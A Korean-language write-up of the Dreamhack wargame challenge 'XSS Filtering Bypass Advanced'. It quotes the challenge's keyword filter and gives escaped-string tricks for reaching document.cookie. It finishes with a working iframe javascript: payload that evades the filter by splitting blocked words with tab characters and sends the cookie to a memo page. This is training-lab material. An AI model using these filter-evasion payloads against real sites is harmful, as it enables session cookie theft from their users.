[Dreamhack] Level 3: XSS Filtering Bypass Advanced

1. 문제 

https://dreamhack.io/wargame/challenges/434

XSS Filtering Bypass Advanced

---

2. 해결 과정

문제 페이지와 전반적인 코드는 다른 xss 문제와 같다. 

필터링 부분의 코드를 살펴보아야 한다. 

 

일단, script, on, javascript는 모두 필터링하고 있다.

즉, <script></script>와 location href, onerror, <script type="text/javascript"></script> 등이 필터링 된다.

 

추가로 window 등이 필터링 되어있다. 

document.cookie

alert(document["\u0063ook" + "ie"]);  //cookie 필터링
window['al\x65rt'](document["\u0063ook" + "ie"]);  // alert, cookie 필터링

이외 HTML Entity Encoding 등을 통한 우회방법들을 방어할 목적으로 보여진다. 

def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    return read_url(url, cookie)

def xss_filter(text):
    _filter = ["script", "on", "javascript"]
    for f in _filter:
        if f in text.lower():
            return "filtered!!!"

    advanced_filter = ["window", "self", "this", "document", "location", "(", ")", "&#"]
    for f in advanced_filter:
        if f in text.lower():
            return "filtered!!!"

    return text

 

필터링 목록에 들어있지 않은 iframe 태그를 사용해 필터링을 우회해볼 수 있다.

javascript, on 필터링은 정규화의 원리를 이용하여 특수문자를 사이에 넣어줄 것이다. 

 

이때, vuln페이지에서 GET 방식으로 직접 전달할 때는 url 인코딩으로 전달하지만, memo 페이지는 POST 방식으로 전달하므로 이때는 url 인코딩이 아닌 리얼 문자를 전송해야한다. 
따라서 memo페이지에는 \x01, \x04 등을 사용할 수 없으므로 \t(tab)을 이용해서 우회할 것이다. 

바로 flag 페이지에 넣어줄 것이다. 

입력하고 싶은 것: <iframe src="javascript:location.href='http:127.0.0.1:8000/memo?memo='+document.cookie">

javascript, location, document 사이에 tab을 넣어서 입력해준다. 

<iframe src="javas	cript:locatio	n.href='http://127.0.0.1:8000/memo?memo='+docu	ment.cookie">

 

성공